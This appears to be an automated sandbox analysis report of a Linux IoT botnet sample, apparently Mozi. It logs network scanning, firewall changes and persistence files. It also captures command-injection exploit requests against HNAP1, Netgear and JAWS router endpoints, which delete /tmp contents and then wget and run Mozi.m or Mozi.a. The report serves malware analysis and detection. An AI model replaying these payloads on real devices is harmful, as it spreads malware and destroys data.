                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 36.185.136.86:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 103.115.64.224:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 65.74.248.65:1023
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 119.84.157.150:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 166.102.52.220:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 156.151.56.37:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 9.208.247.147:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 149.52.37.158:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 141.199.106.142:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 176.146.163.79:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 91.191.81.144:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 213.102.196.97:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 102.201.117.82:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 97.107.48.173:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 189.51.27.16:2323
                            Source: /tmp/bin.sh (PID: 6815) Socket: 0.0.0.0::47453
                            Source: /bin/sh (PID: 6827) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6857) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6863) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6897) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6913) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6935) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6948) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6973) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6992) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                            Source: /bin/sh (PID: 6995) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                            Source: /bin/sh (PID: 6998) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
                            Source: /bin/sh (PID: 7010) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                            Source: /bin/sh (PID: 7067) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                            Source: /bin/sh (PID: 7093) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                            Source: /bin/sh (PID: 7122) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                            Source: /bin/sh (PID: 7145) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                            Source: /bin/sh (PID: 7163) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                            Source: /bin/sh (PID: 7179) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                            Source: /bin/sh (PID: 7200) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
                            Source: /bin/sh (PID: 7216) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
                            Source: /bin/sh (PID: 7230) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                            Source: /bin/sh (PID: 7248) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                            Source: /bin/sh (PID: 7261) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
                            Source: /bin/sh (PID: 7290) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                            Source: /bin/sh (PID: 7316) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7319) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7327) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7351) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7378) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7405) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7426) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7439) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 4000 -j ACCEPT
                            Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0 Host: 221.128.175.114:80 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m` Content-Length: 640 Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global traffic HTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.
                            Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0 Host: 52.54.104.1:80 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m` Content-Length: 640 Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0 Host: 175.119.69.229:80 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m` Content-Length: 640 Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</I
                            Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0 Host: 112.74.206.52:80 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m` Content-Length: 640 Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.89.214.135
                            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 16 Nov 2021 14:45:14 GMT Server: Apache/2.4.51 (cPanel) OpenSSL/1.1.1l mod_bwlimited/1.4 Content-Length: 315 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Cache-Control: no-cache, no-store Content-Type: text/html; charset=utf-8 Via: 1.1 spaces-router (e3eb0c1553be) Date: Tue, 16 Nov 2021 14:46:52 GMT Content-Length: 549 Data Ascii: <!DOCTYPE html><html> <head> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta charset="utf-8"> <title>No such app</title> <style media="screen"> html,body,iframe { margin: 0; padding: 0; } html,body { height: 100%; overflow: hidden; } iframe { width: 100%; height: 100%; border: 0; } </style> </head> <body> <iframe src="//www.herokucdn.com/error-pages/no-such-app.html"></iframe> </body></html>
                            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 16 Nov 2021 14:46:58 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 207 Connection: close Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /setup.cgi was not found on this server.</p></body></html>
                            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2021 14:47:27 GMT Content-Length: 1245
                            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 16 Nov 2021 14:47:34 GMT Server: Apache/2.2.3 (Debian) Content-Length: 280 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p><hr><address>Apache/2.2.3 (Debian) Server at 201.49.41.72 Port 80</address></body></html>
                            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                            Date: Tue, 16 Nov 2021 14:47:34 GMT
                            Server: Apache/2.2.22 (Debian)
                            X-Powered-By: PHP/5.4.45-0+deb7u14
                            Vary: Accept-Encoding
                            Content-Length: 2957
                            Keep-Alive: timeout=15, max=100
                            Connection: Keep-Alive
                            Content-Type: text/html
                            X-Pad: avoid browser bug
                            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                            Server: nginx/1.15.8
                            Date: Tue, 16 Nov 2021 14:47:41 GMT
                            Content-Type: text/html
                            Content-Length: 153
                            Connection: close
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.15.8</center></body></html>
                            Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden
                            Server: nginx
                            Date: Tue, 16 Nov 2021 14:47:51 GMT
                            Content-Type: text/html
                            Content-Length: 1198
                            Connection: close
                            Vary: Accept-Encoding
                            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                            Server: nginx/1.16.1
                            Date: Tue, 16 Nov 2021 14:47:51 GMT
                            Content-Type: text/html; charset=UTF-8
                            Content-Length: 42467
                            Connection: close
                            X-Request-Id: ef485288-6a8c-448a-a0fb-a9632f449634
                            X-Runtime: 0.001219
                            Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden
                            Date: Tue, 16 Nov 2021 14:48:29 GMT
                            Content-Type: application/json
                            Content-Length: 45
                            Connection: close
                            x-amzn-RequestId: e7b030a0-f51e-4aba-ba1c-3db988bfe780
                            Data Ascii: User is not authorized to perform this action
                            Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp String found in binary or memory: http://%s:%d/Mozi.a;chmod
                            Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp String found in binary or memory: http://%s:%d/Mozi.a;sh$
                            Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp String found in binary or memory: http://%s:%d/Mozi.m
                            Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp String found in binary or memory: http://%s:%d/Mozi.m;
                            Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp String found in binary or memory: http://%s:%d/Mozi.m;$
                            Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp String found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
                            Source: bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp String found in binary or memory: http://%s:%d/bin.sh
                            Source: bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp String found in binary or memory: http://%s:%d/bin.sh;chmod
                            Source: bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp String found in binary or memory: http://127.0.0.1
                            Source: bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp String found in binary or memory: http://127.0.0.1sendcmd
                            Source: bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp String found in binary or memory: http://HTTP/1.1
                            Source: bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp String found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
                            Source: .config.8.dr String found in binary or memory: http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
                            Source: bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp String found in binary or memory: http://ipinfo.io/ip
                            Source: alsa-info.sh0.8.dr String found in binary or memory: http://pastebin.ca)
                            Source: alsa-info.sh0.8.dr String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
                            Source: alsa-info.sh0.8.dr String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
                            Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp String found in binary or memory: http://purenetworks.com/HNAP1/
                            Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp, bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp, bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                            Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
                            Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.alsa-project.org
                            Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.alsa-project.org.
                            Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.alsa-project.org/alsa-info.sh
                            Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.alsa-project.org/cardinfo-db/
                            Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.pastebin.ca
                            Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.pastebin.ca.
                            Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.pastebin.ca/upload.php
                            Source: unknown HTTP traffic detected: POST /HNAP1/ HTTP/1.0
                            Host: 221.128.175.114:80
                            Content-Type: text/xml; charset="utf-8"
                            SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                            Content-Length: 640
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: unknown DNS traffic detected: queries for: dht.transmissionbt.com
                            Source: global traffic HTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.
                            Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 3.113.149.148:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive
                            Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 122.201.116.141:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive
                            Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 201.49.41.72:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive
                            Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 216.180.103.7:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive
                            Source: /tmp/bin.sh (PID: 6792) HTML file containing JavaScript created: /usr/networks
                            Source: bin.sh, type: SAMPLE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
                            Source: 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
                            Source: 6821.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
                            Source: 6790.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
                            Source: /usr/networks, type: DROPPED Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
                            Source: ELF static info symbol of initial sample .symtab present: no
                            Source: classification engine Classification label: mal100.spre.troj.evad.linSH@0/221@4/0

                            Persistence and Installation Behavior:

                            Sample tries to persist itself using System V runlevels
                            Source: /tmp/bin.sh (PID: 6792) File: /etc/rcS.d/S95baby.sh
                            Source: /tmp/bin.sh (PID: 6792) File: /etc/rc.local
                            Sample tries to persist itself using /etc/profile
                            Source: /tmp/bin.sh (PID: 6792) File: /etc/profile.d/cedilla-portuguese.sh
                            Source: /tmp/bin.sh (PID: 6792) File: /etc/profile.d/apps-bin-path.sh
                            Source: /tmp/bin.sh (PID: 6792) File: /etc/profile.d/Z97-byobu.sh
                            Source: /tmp/bin.sh (PID: 6792) File: /etc/profile.d/bash_completion.sh
                            Source: /tmp/bin.sh (PID: 6792) File: /etc/profile.d/vte-2.91.sh
                            Executes the "iptables" command to insert, remove and/or manipulate rules
                            Source: /bin/sh (PID: 6827) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6857) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6863) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6897) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6913) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6935) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6948) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6973) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6992) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                            Source: /bin/sh (PID: 6995) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                            Source: /bin/sh (PID: 6998) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
                            Source: /bin/sh (PID: 7010) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                            Source: /bin/sh (PID: 7067) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                            Source: /bin/sh (PID: 7093) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                            Source: /bin/sh (PID: 7122) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                            Source: /bin/sh (PID: 7145) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                            Source: /bin/sh (PID: 7163) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                            Source: /bin/sh (PID: 7179) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                            Source: /bin/sh (PID: 7200) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
                            Source: /bin/sh (PID: 7216) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
                            Source: /bin/sh (PID: 7230) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                            Source: /bin/sh (PID: 7248) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                            Source: /bin/sh (PID: 7261) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
                            Source: /bin/sh (PID: 7290) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                            Source: /bin/sh (PID: 7316) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7319) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7327) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7351) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7378) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7405) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7426) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 4000 -j ACCEPT
